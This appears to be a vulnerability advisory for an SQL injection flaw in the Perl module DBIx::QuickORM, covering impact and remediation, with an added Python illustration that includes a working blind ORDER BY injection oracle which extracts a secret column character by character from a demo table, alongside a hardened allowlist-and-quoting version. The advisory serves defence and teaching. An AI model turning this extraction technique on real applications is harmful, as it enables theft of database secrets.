CVE-2026-13766
EXODIST · DBIx::QuickORM
DBIx::QuickORM for Perl is vulnerable to SQL injection via unquoted SQL identifiers when untrusted input is passed to identifier-related parameters.
Executive summary
A critical SQL injection vulnerability in EXODIST DBIx::QuickORM allows unauthenticated attackers to manipulate database queries, potentially leading to unauthorized data disclosure or tampering.
Vulnerability
The SQL builder interpolates identifiers into the query text without quoting them, so untrusted input passed to an identifier-taking parameter such as order_by or a where-clause column name is executed as raw SQL rather than treated as a column name. Bind parameters do not cover identifiers, which is why this path escapes the usual placeholder protection. The advisory rates the flaw as reachable by an unauthenticated attacker who can inject SQL into the database backend.
Business impact
Successful exploitation poses a severe risk to data integrity and confidentiality. With a CVSS score of 9.8, this flaw could allow attackers to bypass standard query logic to extract sensitive information or modify records, potentially leading to total database compromise and significant reputational damage.
Remediation
Immediate Action: Upgrade DBIx::QuickORM to version 0.000026 or later immediately to resolve the identifier quoting issue.
Proactive Monitoring: Review database access logs for anomalous query patterns, particularly those involving unusual sub-selects or unexpected column references.
Compensating Controls: Until the upgrade lands, constrain every application parameter that selects a column or sort order to an allowlist of known column names, and quote the identifier before it reaches the query (in Perl DBI, $dbh->quote_identifier). Identifiers cannot be passed as bind parameters, so validation and quoting, not parameterization, are the controls here.
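The following is an added illustration of the bug class described in the Vulnerability and Remediation sections, written for this page; it is not DBIx::QuickORM's code and does not use its API. It uses Python's sqlite3 and a constructed users table to show (1) an order_by builder that interpolates the identifier verbatim, (2) how an attacker turns that into a blind, ordering-based oracle that recovers a secret column one character at a time, and (3) the hardened form that allowlists the column and quotes the identifier. Table, column and function names are assumptions chosen for the demonstration.

```python
import sqlite3


# Constructed sample data for the demonstration; not from the advisory.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, api_key TEXT);
        INSERT INTO users VALUES (1, 'alice', 'key-alpha');
        INSERT INTO users VALUES (2, 'bob',   'key-bravo');
        INSERT INTO users VALUES (3, 'carol', 'key-charlie');
        """
    )
    return conn


def vulnerable_order_by(conn: sqlite3.Connection, column: str) -> list:
    """Unquoted-identifier pattern: the caller's string lands in the SQL verbatim.

    Bind parameters cannot help here; an ORDER BY target is an identifier
    (or expression), not a value, so whatever is passed becomes query text.
    """
    sql = f"SELECT id, name FROM users ORDER BY {column}"
    return conn.execute(sql).fetchall()


def ordering_oracle(conn: sqlite3.Connection, like_pattern: str) -> bool:
    """Blind extraction through the sort order.

    The injected ORDER BY expression sorts ascending by id when the guess
    matches and descending when it does not, so the first row leaks one bit.
    """
    payload = (
        "CASE WHEN (SELECT api_key FROM users WHERE id = 1) LIKE "
        f"'{like_pattern}' THEN id ELSE -id END"
    )
    rows = vulnerable_order_by(conn, payload)
    return rows[0][0] == 1


def recover_secret_prefix(conn: sqlite3.Connection, length: int) -> str:
    """Character-by-character recovery of user 1's api_key via the oracle.

    The alphabet deliberately excludes the LIKE wildcards % and _.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    known = ""
    for _ in range(length):
        for ch in alphabet:
            if ordering_oracle(conn, known + ch + "%"):
                known += ch
                break
        else:
            break  # no character matched; stop rather than guess
    return known


# ---- hardened version ----------------------------------------------------

# Allowlist of sortable columns; api_key is deliberately not sortable.
SORTABLE_COLUMNS = frozenset({"id", "name"})


def quote_identifier(name: str) -> str:
    """Double-quote an identifier, doubling embedded quotes (standard SQL
    identifier quoting; DBI's $dbh->quote_identifier does this job in Perl)."""
    return '"' + name.replace('"', '""') + '"'


def safe_order_by(conn: sqlite3.Connection, column: str) -> list:
    """Allowlist first, then quote: the allowlist rejects anything that is not
    a known sortable column, and quoting guarantees that even a permitted
    name is parsed as an identifier and never as an expression."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {column!r}")
    sql = f"SELECT id, name FROM users ORDER BY {quote_identifier(column)}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked api_key:", recover_secret_prefix(db, 9))
    try:
        safe_order_by(db, "api_key")
    except ValueError as exc:
        print("rejected:", exc)
```

The oracle never needs error messages or stacked statements; a single ORDER BY expression and the returned row order are enough to walk out a secret, which is why "the application only sorts by it" is not a mitigation. The hardened builder applies both layers on purpose: quoting alone would still let a caller sort by api_key, and an allowlist alone still leaves the raw interpolation in place for the next developer to misuse.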
Exploitation status
Public Exploit Available: No
Analyst recommendation
This vulnerability represents a significant security risk for applications relying on DBIx::QuickORM. Organizations must prioritize updating the dependency to the patched version; SQL injection remains a primary vector for data breaches, and the lack of a public exploit should not be read as a reason to defer the upgrade.